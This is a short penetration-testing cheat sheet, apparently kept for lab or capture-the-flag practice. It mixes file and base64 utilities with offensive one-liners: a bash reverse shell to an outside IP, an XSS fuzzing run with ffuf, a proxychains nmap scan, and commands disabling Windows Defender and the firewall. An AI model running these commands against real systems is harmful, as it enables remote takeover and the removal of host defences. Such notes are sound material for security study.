(constantly under construction)
Python interactive shell
- python3 -c 'import pty;pty.spawn("/bin/bash")'
Linux Reverse Shell in one line
- /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.74/443 0>&1'
File Extraction
- tar ball: tar -xvf <filename.tar.gz or just .tar> -C <target directory>
- zip: unzip -q <filename.zip> -d </path/to/dir>
File Compression
- tar ball (gzip-compressed): tar -czvf archive.tar.gz file1 file2
- zip: zip -q <archivename.zip> file1 file2 file3
Base64 encode and decode
- Directly at the command line (-n so the trailing newline is not encoded)
- echo -n "plaintext" | base64
- echo -n "<base64 text>" | base64 --decode
- From a text file when the content contains special characters or quotes
- base64 input.txt
- base64 --decode input.txt
FFUF fuzzing
The general flags
- Put the keyword FUZZ in the field you want to fuzz or enumerate.
- -w, to specify the wordlist
- -X POST, to specify the HTTP method
- -d, to specify the data
- -H, to specify a header (repeat for multiple headers)
- -mc all -ac, to match every status code and auto-calibrate the filters so baseline (default) responses are dropped
- -fc 404,502, to filter out responses with status code 404 or 502 (the filter flag is -fc; -ac takes no argument)
- -fs, to filter out responses of the given size(s), comma-separated
- -fw, to filter out responses with the given word count(s), comma-separated
- -e, to append extensions to each wordlist entry (e.g. -e .php,.txt)
- XSS fuzz with POST request
ffuf -w /usr/share/wordlists/seclists/Fuzzing/XSS/human-friendly/XSS-BruteLogic.txt -u http://10.129.232.215:5000/support -X POST -d "fname=123&lname=123&email=hello%40123.com&phone=123&message=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -mc all -ac
- directory enumeration
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.129.232.215:5000/FUZZ -mc all -ac
Nmap Proxychains scan
- sudo proxychains nmap -sT --top-ports 20 -Pn 172.16.x.194
Disable AV and Firewall
- From cmd: powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true" & netsh advfirewall set allprofiles state off
- From a PowerShell prompt (use ; as the separator, since & is the call operator): Set-MpPreference -DisableRealtimeMonitoring $true; netsh advfirewall set allprofiles state off